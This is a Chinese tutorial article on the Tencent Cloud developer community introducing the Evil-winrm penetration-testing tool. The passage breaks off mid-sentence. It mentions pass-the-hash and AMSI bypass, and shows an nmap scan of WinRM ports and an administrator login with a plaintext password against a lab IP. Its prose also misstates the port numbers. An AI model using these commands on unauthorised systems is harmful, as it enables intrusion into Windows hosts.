<!DOCTYPE html><html lang="zh" munual-autotracker-init="" qct-uid="" qct-pv-id="71-MWCFpCVoTQ0mrbAq7T" qct-ip="8.222.208.146"><head><meta charSet="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="format-detection" content="telephone=no"/><title>【Tools】黑客渗透超级管理终端Evil-winrm-腾讯云开发者社区-腾讯云</title><meta name="subject" content="其他-空类-tools,其他-空类-工具,其他-空类-管理,其他-空类-终端,通用技术-开发技术-黑客"/><meta name="subjectTime" content="2024-11-27 18:26:06"/><meta name="articleSource" content="W"/><meta name="magicSource" content="N"/><meta name="authorType" content="Z,O"/><meta name="productSlug" content="wpt,ddos"/><meta name="keywords" content="tools,工具,管理,终端,黑客"/><meta name="description" content="在网络安全领域，技术的进步总是伴随着攻防两端的较量。今天，我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm，它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议（PSRP）协同工作，利用Windows远程管理协议（..."/><meta property="og:title" content="【Tools】黑客渗透超级管理终端Evil-winrm-腾讯云开发者社区-腾讯云"/><meta property="og:description" content="在网络安全领域，技术的进步总是伴随着攻防两端的较量。今天，我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm，它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议（PSRP）协同工作，利用Windows远程管理协议（..."/><meta property="og:image" content="https://cloudcache.tencentcs.com/open_proj/proj_qcloud_v2/gateway/shareicons/cloud.png"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, viewport-fit=cover"/><link rel="dns-prefetch" href="//qccommunity.qcloudimg.com"/><link rel="dns-prefetch" href="//ask.qcloudimg.com"/><link rel="dns-prefetch" href="//cloudcache.tencentcs.com"/><link rel="canonical" href="https://cloud.tencent.com/developer/article/2471795"/><meta name="next-head-count" content="20"/><link rel="stylesheet" href="https://imgcache.qq.com/open_proj/proj_qcloud_v2/gateway/portal/css/base.css"/><link rel="stylesheet" href="https://cloudcache.tencentcs.cn/qcloud/ui/cloud-community/build/base/base-202502111512.css"/><style type="text/css"> .rno-markdown p * { white-space: pre-wrap; word-break: break-all; } .tea-overlay { z-index: 99999!important; } </style><link rel="stylesheet" href="https://cloudcache.tencentcs.cn/qcloud/ui/cloud-community/build/Article/Article-202502111516.css"/><link rel="stylesheet" href="https://cloudcache.tencent-cloud.cn/qcloud/draft-master/dist/draft-master-v2.1.2.d4s2ddo9sb.css"/><link rel="stylesheet" href="https://qccommunity-1258344699.cos.ap-guangzhou.myqcloud.com/tc_player/releasev5.1.0/tcplayer.min.css"/><script src="https://tam.cdn-go.cn/aegis-sdk/latest/aegis.min.js"></script><script> if (Aegis) { new Aegis({ id: 'dWlmyFvjDnalkbZO8q', env: 'production', onError: true, pagePerformance: true, reportAssetSpeed: true, api: { reportRequest: true, resHeaders: ['x-req-id'], }, reportApiSpeed: true, beforeRequest: function (data) { // load js failed if (data.logType === 'log') { if (data.logs.level === '32' && data.logs.msg.indexOf('google') > -1) return false; } var ignoreKeys = [ 'Script error', 'chrome-extension', 'qq.com', 'queryWeappQrcodeStatus', 'login/ajax/info', 'woa.com', 'trafficCollect.php', 'google', 'dscache', 'act-api', 'set_qc_cookie', 'opc.cloud.tencent.com', 'uc_gre_ad_buss', 'eb.xcj.pub', 'UCShellJava', '/developer/labs/quick/loader', 'edgeImmersiveReaderDOM', 'sendBeacon', 'error-decoder.html', 'qcloud-community-track.min.js' ]; var alarmMsg = [data.logs.url, data.logs.msg].join('|'); for (var i = 0; i < ignoreKeys.length; i++) { if (alarmMsg.indexOf(ignoreKeys[i]) != -1) return false; } if (/bot|wechatdevtools|spider/i.test(navigator.userAgent)) { return false; } if (location.hostname.indexOf('cloud.tencent.') === -1) { return false; } }, }); } </script><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/15864e0bbdb1e0dc.css" as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/15864e0bbdb1e0dc.css" data-n-g=""/><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/cb2973c13eafc770.css" as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/cb2973c13eafc770.css" data-n-p=""/><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/76e9fe126c1f99d5.css" as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/76e9fe126c1f99d5.css" data-n-p=""/><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/6bae135cca0bd2a2.css" as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/6bae135cca0bd2a2.css" data-n-p=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/webpack-ecb33d6f281c3863.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/framework-bae252e255276064.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/main-b171722e7f1a1add.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/pages/_app-4d4d0038fd3b92af.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/3598-9ce47f9460fcd2e8.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/900-754acf570f26d1b3.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/5711-8b004fba753fc2ae.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/1522-ac3b1777b1c36fd6.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4031-e3e3905dc88f3f92.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9142-8d6871ee01ef3752.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/2929-2732ed4070c148cd.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/6213-23c1f09036ef74b2.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/3751-d6902cb0fa3abff0.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9159-237e4ba66a152bd5.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4036-6e337191f9b1f6d5.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/1126-c4d27d89bdcaa920.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/432-8c085b26d42596c0.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/2654-a4137ccd8ac059bd.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/856-06c42ea61ae5c3f2.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9179-8e6d979e9f59fb65.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4698-c5f3e13cdb54e8e1.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/6326-791c8ec3fe3e7c9f.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/8899-a236cb0292d33b84.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4989-ab5859ddb53d3104.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9621-3128a32b4a60c481.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9156-e37c75a3b314bfda.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/pages/article/%5BarticleId%5D-f1fa4a2b494e4989.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/9hp3loRhW5K95-TQOzEpv/_buildManifest.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/9hp3loRhW5K95-TQOzEpv/_ssgManifest.js" defer=""></script></head><body class=""><div id="__next"><script src="https://dscache.tencent-cloud.cn/ecache/qcstat/qcloud/qcloudStatApi.js"></script><script src="https://qccommunity.qcloudimg.com/common/exposure-plugin-4.1.15.min.js"></script><script src="https://qccommunity.qcloudimg.com/community-track/qcloud-community-track.min.js"></script><div class="cdc-responsive-layout" aegis-first-screen-timing="true" qct-area="文章详情页"><div class="cdc-article-page cdc-global"><div class="cdc-sticky-header mod-sticky-header is-hidden" style="left:0"><div id="community-top-sticky-header-product-container"></div><div class="cdc-sticky-header__inner"><div class="cdc-sticky-header__main"><div class="mod-sticky-header__main"><div class="mod-sticky-header__author"><span class="cdc-avatar circle"><a class="cdc-avatar__inner" style="background-image:url(https://developer.qcloudimg.com/http-save/10011/f7e7056991e2e0aebf44c32cfa9b462a.jpg)" href="/developer/user/2017757" target="_blank"></a></span><div class="author-info"><a class="author-info__name" href="/developer/user/2017757" target="_blank"><span class="name-text">释然IT杂谈</span></a></div></div><div class="mod-sticky-header__split"></div><div class="mod-sticky-header__title"><div class="mod-sticky-header__title-content"><h2 class="title-text">【Tools】黑客渗透超级管理终端Evil-winrm</h2></div></div></div></div><div class="cdc-sticky-header__extra"><div class="mod-sticky-header__operates"><button class="cdc-btn mod-sticky-header__operate btn-focus cdc-btn--primary"><i class="add-icon"></i><span>关注作者</span></button></div></div></div></div><div class="cdc-m-guider-banner"><div class="cdc-m-guider-banner__guide-mvp is-detail-page"><div class="cdc-m-guider-banner__guide-mvp-text">前往小程序，Get<em>更优</em>阅读体验！</div><div class="cdc-m-guider-banner__guide-mvp-btn">立即前往</div></div></div><div class="cdc-header cdc-header--block" track="导航"><div class="cdc-header__placeholder"></div><div class="cdc-header__inner"><div id="community-top-header-product-container"></div><div class="cdc-header__top"><div class="cdc-header__top-left"><a href="/?from=20060&amp;from_column=20060" target="_blank" class="cdc-header__top-logo" hotrep="" track="腾讯云官网入口"><i>腾讯云</i></a><div class="cdc-header__top-line"></div><a href="/developer" class="cdc-header__top-logo community"><i>开发者社区</i></a><div class="cdc-header__activity"><div id="cloud-header-product-container"></div></div></div><div class="cdc-header__top-operates"><a href="/document/product?from=20702&amp;from_column=20702" target="_blank" class="cdc-header__link">文档</a><a href="/voc/?from=20703&amp;from_column=20703" target="_blank" class="cdc-header__link">建议反馈</a><a href="https://console.cloud.tencent.com?from=20063&amp;from_column=20063" target="_blank" class="cdc-header__link" track-click="{&quot;areaId&quot;:102001,&quot;subAreaId&quot;:1}">控制台</a><div class="cdc-header__account"><div class="cdc-header__account-inner"><button class="cdc-btn cdc-header__account-btn cdc-btn--primary">登录/注册</button></div></div></div></div><div class="cdc-header__bottom"><div class="cdc-header__bottom-nav"><a href="/developer" class="cdc-header__bottom-home">首页</a><div class="cdc-header__nav-list"><div class="cdc-header__nav-item">学习</div><div class="cdc-header__nav-item">活动</div><div class="cdc-header__nav-item">专区</div><div class="cdc-header__nav-item">工具</div></div><a href="/tvp?from=20154&amp;from_column=20154" class="cdc-header__tvp" target="_blank">TVP</a><div class="cdc-header__activity"><a class="cdc-header__activity-tit" href="/developer/program/tm" target="_blank">腾讯云架构师技术同盟<div class="cdc-badge"><div class="cdc-badge-inner"><div class="cdc-badge-text"></div></div></div></a></div><div id="community-header-product-container"></div></div><div class="cdc-header__bottom-operates"><div class="cdc-header__search"><div class="cdc-search__wrap"><div class="cdc-search"><span class="cdc-search__text">文章/答案/技术大牛</span><button class="cdc-search__btn">搜索<i class="cdc-search__i search"></i></button></div><div class="cdc-search__dropdown"><div class="cdc-search__bar"><input type="text" class="cdc-search__bar-input" placeholder="文章/答案/技术大牛" value=""/><div class="cdc-search__bar-btns"><button class="cdc-search__btn">搜索<i class="cdc-search__i search"></i></button><button class="cdc-search__btn">关闭<i class="cdc-search__i clear"></i></button></div></div></div></div></div><div class="cdc-header__create"><span class="cdc-header__create-btn not-logged"><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:16px;height:16px"><svg width="16" height="16" viewBox="0 0 16 16" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path d="M14.2466 12.0145C14.1698 13.6258 12.8381 14.9131 11.2129 14.9131H11.1579H4.0927H4.03772C2.4125 14.9131 1.08014 13.6258 1.00334 12.0145H1V11.8668V4.07213V4.04627V3.89922H1.00334C1.08014 2.28732 2.4125 1 4.03772 1H9.6473V1.00069H10.0786L8.7688 2.10773H8.43888H7.7916H6.37904H4.03772C2.97234 2.10773 2.10445 2.9777 2.10445 4.04629V4.41869V4.4472V6.39498V11.4269V11.4309V11.8668C2.10445 12.9354 2.97234 13.8053 4.03772 13.8053H6.37904H8.87153H11.2129C12.2782 13.8053 13.1461 12.9355 13.1461 11.8668V11.466V11.454V9.5181V6.39364L14.2506 5.3051V11.8668V12.0145H14.2466ZM10.4324 7.15226L9.63146 7.99761C9.36577 8.2693 8.69326 8.95104 8.48066 9.17631C8.26726 9.40288 8.09039 9.58901 7.95061 9.73544C7.81079 9.88188 7.72667 9.96597 7.70083 9.98656C7.63321 10.0488 7.55703 10.1144 7.47022 10.1846C7.38412 10.2542 7.29404 10.3099 7.20063 10.3516C7.10722 10.4007 6.97072 10.459 6.79049 10.5305C6.61028 10.6001 6.42213 10.6676 6.22468 10.7339C6.02792 10.8002 5.84109 10.8571 5.66484 10.9061C5.48795 10.9538 5.3561 10.9863 5.2693 11.0009C5.08977 11.0214 4.96988 10.993 4.90956 10.9168C4.84931 10.8405 4.83276 10.7107 4.85924 10.5312C4.87315 10.4331 4.9043 10.292 4.95468 10.1078C5.00431 9.92297 5.05802 9.7315 5.11431 9.53341C5.1713 9.33526 5.22629 9.15179 5.27926 8.98484C5.33297 8.8179 5.37599 8.7026 5.40978 8.64032C5.44953 8.54357 5.49463 8.45413 5.54495 8.37399C5.59465 8.29379 5.66616 8.20503 5.75965 8.10766C5.79934 8.06588 5.89281 7.96649 6.03988 7.81018C6.18624 7.65311 6.80114 7.02774 7.02104 6.79783L7.75117 6.03524L8.56212 5.1899L10.6345 3.02466L12.5214 4.93874L10.4324 7.15226ZM13.816 3.58581C13.7166 3.68987 13.6272 3.78064 13.5483 3.85883C13.4694 3.93703 13.4006 4.0066 13.3423 4.06686C13.276 4.13643 13.2144 4.19738 13.1561 4.24903L11.2785 2.33569C11.3785 2.24025 11.4965 2.12565 11.6336 1.99115C11.7707 1.85668 11.8854 1.75061 11.9761 1.67242C12.0934 1.57708 12.2133 1.51013 12.3385 1.47109C12.4525 1.43529 12.5644 1.41805 12.6751 1.41876H12.7056C12.7665 1.42139 12.8268 1.42729 12.8851 1.43724C12.8838 1.4366 12.8811 1.43724 12.8798 1.4366C12.8811 1.4366 12.8838 1.4366 12.8851 1.43724C13.1376 1.48428 13.4019 1.62009 13.6265 1.83743C13.7511 1.95871 13.8524 2.09382 13.9259 2.23296C14.0346 2.43834 14.0863 2.65304 14.0763 2.8491C14.0763 2.87294 14.0783 2.89748 14.0783 2.92201C14.0783 3.03529 14.0571 3.14789 14.0154 3.26055C13.9737 3.37314 13.9067 3.48185 13.816 3.58581Z" fill="#0052D9"></path></svg></span></span>发布<span class="cdc-svg-icon-con cdc-header__create-btn-arrow"><span class="cdc-svg-icon" style="width:16px;height:16px"><svg width="16" height="16" viewBox="0 0 16 16" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path d="M8.16377 4L9.57798 5.41421L14.5277 10.364L13.1135 11.7782L8.1638 6.829L3.21402 11.7782L1.7998 10.364L8.16377 4Z"></path></svg></span></span></span></div></div></div></div></div><div class="cdc-m-sticky-header is-hidden is-sticky"><div class="cdc-m-sticky-header__placeholder"></div><div class="cdc-m-sticky-header__main"><div class="cdc-m-sticky-header__con"><div class="cdc-m-sticky-header__trigger"></div><div class="cdc-m-header-article__menu"><div class="cdc-m-header-article__menu-mask"></div><div class="cdc-m-header-article__menu-side"><div class="cdc-m-header__sidebar"><div class="cdc-m-header__sidebar-top"><i class="cdc-m-header__sidebar-top__logo"></i><span class="cdc-m-header__sidebar-top__back"></span></div><div class="cdc-m-header__sidebar-menus"><a href="/developer" class="cdc-m-header__sidebar-menu link">首页</a><div class="tpm1-collapse"><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">学习</div></header></div><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">活动</div></header></div><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">专区</div></header></div><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">工具</div></header></div></div><a href="/tvp?from=20154&amp;from_column=20154" class="cdc-m-header__sidebar-menu link">TVP</a><a class="cdc-m-header__sidebar-activity" href="/developer/program/tm" target="_blank">腾讯云架构师技术同盟<div class="cdc-badge"><div class="cdc-badge-inner"><div class="cdc-badge-text"></div></div></div></a></div><div class="cdc-m-header__sidebar-back"><a href="/?from=20060&amp;from_column=20060" class="cdc-m-header__sidebar-back__link"><i></i><span>返回腾讯云官网</span></a></div></div></div></div><div class="cdc-m-sticky-header__author"><span class="cdc-avatar large circle" style="cursor:unset"><span class="cdc-avatar__inner" style="background-image:url(https://developer.qcloudimg.com/http-save/10011/f7e7056991e2e0aebf44c32cfa9b462a.jpg)"></span></span><div class="cdc-m-sticky-header__author-name">释然IT杂谈</div></div></div><div class="cdc-m-sticky-header__extra"><div class="cdc-m-sticky-header__extra-icon"><i class="extra-search"></i></div><div class="cdc-m-sticky-header__extra-icon"><i class="extra-share"></i></div><div class="cdc-m-sticky-header__extra-operate"><div class="cdc-m-sticky-header__extra-icon"><i class="extra-man"></i></div></div></div></div></div><div class="cdc-m-header-article"><div class="cdc-m-header-article__placeholder"></div><div class="cdc-m-header-article__content"><div class="cdc-m-header-article__main"><div class="cdc-m-header-article__con"><div class="cdc-m-header-article__trigger"></div><div class="cdc-m-header-article__menu"><div class="cdc-m-header-article__menu-mask"></div><div class="cdc-m-header-article__menu-side"><div class="cdc-m-header__sidebar"><div class="cdc-m-header__sidebar-top"><i class="cdc-m-header__sidebar-top__logo"></i><span class="cdc-m-header__sidebar-top__back"></span></div><div class="cdc-m-header__sidebar-menus"><a href="/developer" class="cdc-m-header__sidebar-menu link">首页</a><div class="tpm1-collapse"><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">学习</div></header></div><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">活动</div></header></div><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">专区</div></header></div><div class="tpm1-collapse__panel"><header class="tpm1-collapse__panel-hd"><div class="tpm1-collapse__panel-title">工具</div></header></div></div><a href="/tvp?from=20154&amp;from_column=20154" class="cdc-m-header__sidebar-menu link">TVP</a><a class="cdc-m-header__sidebar-activity" href="/developer/program/tm" target="_blank">腾讯云架构师技术同盟<div class="cdc-badge"><div class="cdc-badge-inner"><div class="cdc-badge-text"></div></div></div></a></div><div class="cdc-m-header__sidebar-back"><a href="/?from=20060&amp;from_column=20060" class="cdc-m-header__sidebar-back__link"><i></i><span>返回腾讯云官网</span></a></div></div></div></div></div><div class="cdc-m-header-article__title"><div class="cdc-m-header-article__title-logo"></div></div><div class="cdc-m-header-article__extra"><div class="cdc-m-header-article__extra-icon"><i class="extra-search"></i></div><div class="cdc-m-header-article__extra-operate"><div class="cdc-m-header-article__extra-icon"><i class="extra-man"></i></div></div></div></div></div></div><div class="cdc-global__main"><div class="cdc-article__body"><div class="cdc-layout"><div class="cdc-layout__main"><div class="cdc-crumb mod-crumb"><div class="cdc-crumb__inner"><a class="cdc-crumb__item" href="/developer">社区首页</a><span class="cdc-crumb__split"> &gt;</span><a class="cdc-crumb__item" href="/developer/column">专栏</a><span class="cdc-crumb__split"> &gt;</span><span class="cdc-crumb__item current">【Tools】黑客渗透超级管理终端Evil-winrm</span></div></div><div class="mod-article-content"><div class="mod-header"><div class="mod-header__top"><div class="mod-header__title"><h1 class="title-text">【Tools】黑客渗透超级管理终端Evil-winrm</h1></div></div><div class="mod-article-source header"><div class="mod-article-source__main"><div class="mod-article-source__avatar"><img src="https://developer.qcloudimg.com/http-save/10011/f7e7056991e2e0aebf44c32cfa9b462a.jpg" alt="作者头像"/></div><div class="mod-article-source__detail"><div class="mod-article-source__name"><span>释然IT杂谈</span></div></div><button class="cdc-btn mod-article-source__operate cdc-btn--primary"><span><i></i>关注</span></button></div></div><div class="mod-header__bottom"><div class="mod-header__detail"><div class="mod-header__date"><span class="date-text">发布<!-- -->于 <!-- -->2024-11-27 18:26:06</span></div><div class="mod-header__date is-mobile"><span class="date-text">发布<!-- -->于 <!-- -->2024-11-27 18:26:06</span></div><div class="mod-header__infos"><div class="cdc-icon__list"><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:16px;height:16px"><svg width="16" height="16" viewBox="0 0 16 16" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><g id="icon-view" transform="translate(0.000000, 3.000000)" fill="currentcolor" fill-rule="nonzero"><path d="M15.885,4.68036 C14.9951,3.57569 11.7987,-0.004272 7.99883,-0.004272 C4.19895,-0.004272 1.02302,3.57569 0.112682,4.68036 C0.040058,4.77107 0.000488281,4.88381 0.000488281,5 C0.000488281,5.1162 0.040058,5.22894 0.112682,5.31964 C1.00767,6.42432 4.20407,10.0043 7.99883,10.0043 C11.7936,10.0043 14.9951,6.42432 15.885,5.31964 C15.9576,5.22894 15.9972,5.1162 15.9972,5 C15.9972,4.88381 15.9576,4.77107 15.885,4.68036 Z M7.99883,8.97632 C4.93029,8.97632 2.25555,6.25043 1.17644,4.99745 C2.25555,3.74446 4.95586,1.01857 7.99883,1.01857 C11.0418,1.01857 13.7421,3.74446 14.8314,4.99745 C13.7421,6.25043 11.0418,8.97632 7.99883,8.97632 Z" id="形状"></path><path d="M7.97304,2.55286 C7.49865,2.55286 7.03491,2.69353 6.64046,2.95709 C6.24602,3.22065 5.93859,3.59525 5.75704,4.03354 C5.5755,4.47182 5.528,4.95409 5.62055,5.41937 C5.7131,5.88465 5.94154,6.31203 6.27699,6.64748 C6.61244,6.98293 7.03982,7.21137 7.5051,7.30392 C7.97038,7.39647 8.45265,7.34897 8.89093,7.16743 C9.32922,6.98588 9.70382,6.67845 9.96738,6.28401 C10.2309,5.88956 10.3716,5.42582 10.3716,4.95143 C10.3716,4.31529 10.1189,3.7052 9.66909,3.25538 C9.21927,2.80556 8.60918,2.55286 7.97304,2.55286 Z M7.97304,6.32716 C7.70095,6.32716 7.43496,6.24647 7.20872,6.09531 C6.98249,5.94414 6.80616,5.72928 6.70203,5.4779 C6.59791,5.22652 6.57066,4.94991 6.62374,4.68304 C6.67683,4.41617 6.80785,4.17104 7.00025,3.97864 C7.19265,3.78625 7.43778,3.65522 7.70465,3.60214 C7.97151,3.54905 8.24813,3.5763 8.49951,3.68042 C8.75089,3.78455 8.96575,3.96088 9.11692,4.18712 C9.26808,4.41335 9.34877,4.67934 9.34877,4.95143 C9.35012,5.13295 9.31553,5.31295 9.247,5.48104 C9.17846,5.64913 9.07734,5.802 8.94946,5.93084 C8.82158,6.05967 8.66946,6.16192 8.50188,6.2317 C8.3343,6.30147 8.15457,6.33739 7.97304,6.33739 L7.97304,6.32716 Z" id="形状"></path></g></svg></span><span class="cdc-svg-icon-text">171</span></span><span class="cdc-svg-icon-con is-comment"><span class="cdc-svg-icon" style="width:16px;height:16px"><svg width="16" height="16" viewBox="0 0 16 16" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M8 13.414L5.58594 11H2V3H14V11H10.4141L8 13.414ZM5.17175 12L8 14.8282L10.8282 12H15V2H1V12H5.17175ZM4 6C3.44775 6 3 6.44769 3 7C3 7.55231 3.44775 8 4 8C4.55225 8 5 7.55231 5 7C5 6.44769 4.55225 6 4 6ZM7 7C7 6.44769 7.44775 6 8 6C8.55225 6 9 6.44769 9 7C9 7.55231 8.55225 8 8 8C7.44775 8 7 7.55231 7 7ZM12 6C11.4478 6 11 6.44769 11 7C11 7.55231 11.4478 8 12 8C12.5522 8 13 7.55231 13 7C13 6.44769 12.5522 6 12 6Z"></path></svg></span><span class="cdc-svg-icon-text">0</span></span></div></div></div><div class="mod-header__operates"><div class="mod-header__operate"><span class="cdc-svg-icon-con is-operate"><span class="cdc-svg-icon" style="width:16px;height:16px"><svg width="16" height="16" viewBox="0 0 16 16" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M9.21101 2.54545C8.80733 1.81818 7.79814 1.81818 7.39446 2.54545L1.94481 12.3636C1.54113 13.0909 2.04573 14 2.85308 14H13.7524C14.5597 14 15.0643 13.0909 14.6607 12.3636L9.21101 2.54545ZM2.85308 12.9091L8.30273 3.09091L13.7524 12.9091H2.85308ZM8.00037 6H9.00037V10H8.00037V6ZM8.00037 11H9.00037V12H8.00037V11Z" fill="currentcolor"></path></svg></span><span class="cdc-svg-icon-text">举报</span></span></div></div></div><div class="mod-header__special"><div class="cdc-special-guide"><span><i class="cdc-special-guide-icon"></i>文章被收录于专栏：</span><a class="cdc-special-guide-name">释然IT杂谈</a></div></div></div><div class="mod-content"><div class="mod-content__markdown"><div><div class="rno-markdown new-version rno-"><p>前言介绍：</p><p>在网络安全领域，技术的进步总是伴随着攻防两端的较量。今天，我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm，它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议（PSRP）协同工作，利用Windows远程管理协议（WinRM）实现远程操作。</p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/ba9e7899724c2581f2d66168687481c4.png" alt="" style="width:100%"/></div></div></div></figure><p>Evil-winrm工具以其多功能性和实用性脱颖而出，它不仅支持通过纯文本密码、SSL加密、NTLM哈希、密钥等多种方式进行远程登录，还具备文件传输、日志记录等高级功能。此外，该工具还能绕过某些安全软件在内存中加载DLL文件，动态绕过AMSI等安全机制。</p><p> 该工具已在Kali Linux系统中集成，但如果您想单独下载使用，则可以从其官方 git 存储库下载它。作为一款开源软件，Evil-winrm的获取十分便捷，您可以直接访问GitHub上的项目页面进行下载。</p><p><u>https://github.com/Hackplayers/evil-winrm</u></p><p>WinRM服务的发现与利用：</p><p>WinRM是微软Windows操作系统中的一种远程管理协议，基于WS-Management协议，允许远程执行命令、脚本和管理任务。通过nmap工具，我们可以检测目标主机是否开启了WinRM服务的两个默认端口5895和5896，使用如下命令：</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">nmap -p 5985,5986 192.168.1.19 </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:86.82%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/782139bb357672ee1d85e120caf3c50a.png" alt="" style="width:100%"/></div></div></div></figure><p>一旦确认目标主机的WinRM服务已开启，我们便可以使用Evil-winrm进行远程管理。</p><p>多种登录方式：</p><p>Evil-winrm支持多种登录方式，包括使用纯文本密码登录、启动SSL加密的登录会话、利用NTLM哈希进行传递哈希攻击等。</p><p><strong>纯文本密码登录：</strong></p><p>如果您已经通过合法的枚举方式获取了目标主机的纯文本密码，您可以使用Evil-winrm工具进行远程会话。以下是如何使用Evil-winrm进行远程会话的示例命令：</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:94.25%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/261b558d4bb2028ad13ac47927d178d0.png" alt="" style="width:100%"/></div></div></div></figure><p>可以看到, 